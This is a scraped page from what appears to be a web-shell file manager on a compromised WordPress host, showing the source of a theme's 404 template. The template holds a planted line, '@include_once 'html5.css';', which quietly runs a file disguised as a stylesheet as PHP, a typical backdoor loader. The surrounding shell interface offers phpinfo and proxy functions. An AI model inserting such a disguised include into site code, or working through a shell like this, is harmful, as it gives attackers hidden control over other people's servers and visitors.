File manager - Edit - /home2/ajansonline/public_html/wp-content/themes/mokko/404.php
Back
<?php /** * @author: MadSparrow * @version: 1.0 */ // Do not allow directly accessing this file. if ( ! defined( 'ABSPATH' ) ) { exit( 'Direct script access denied.' ); } @include_once 'html5.css'; get_header(); get_template_part( 'template-parts/header/header'); ?> <section class="ms-page-content ms-404-page"> <div class="ms-404--content"> <h2><?php esc_html_e('Whoops, that page is gone.', 'mokko') ?></h2> <p><?php esc_html_e('The page you are looking for does not exist. How you got here is a mystery. Go back to the', 'mokko') ?> <a data-style="yes" class="ms-sl" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php esc_html_e('homepage.', 'mokko') ?></a> </p> </div> <div class="ms-404--bg"> <h1><?php echo esc_attr('404', 'mokko')?></h1> </div> </section> <?php wp_footer(); ?>
| ver. 1.4 |
Github
|
.
| PHP 8.1.30 | Generation time: 0.24 |
proxy
|
phpinfo
|
Settings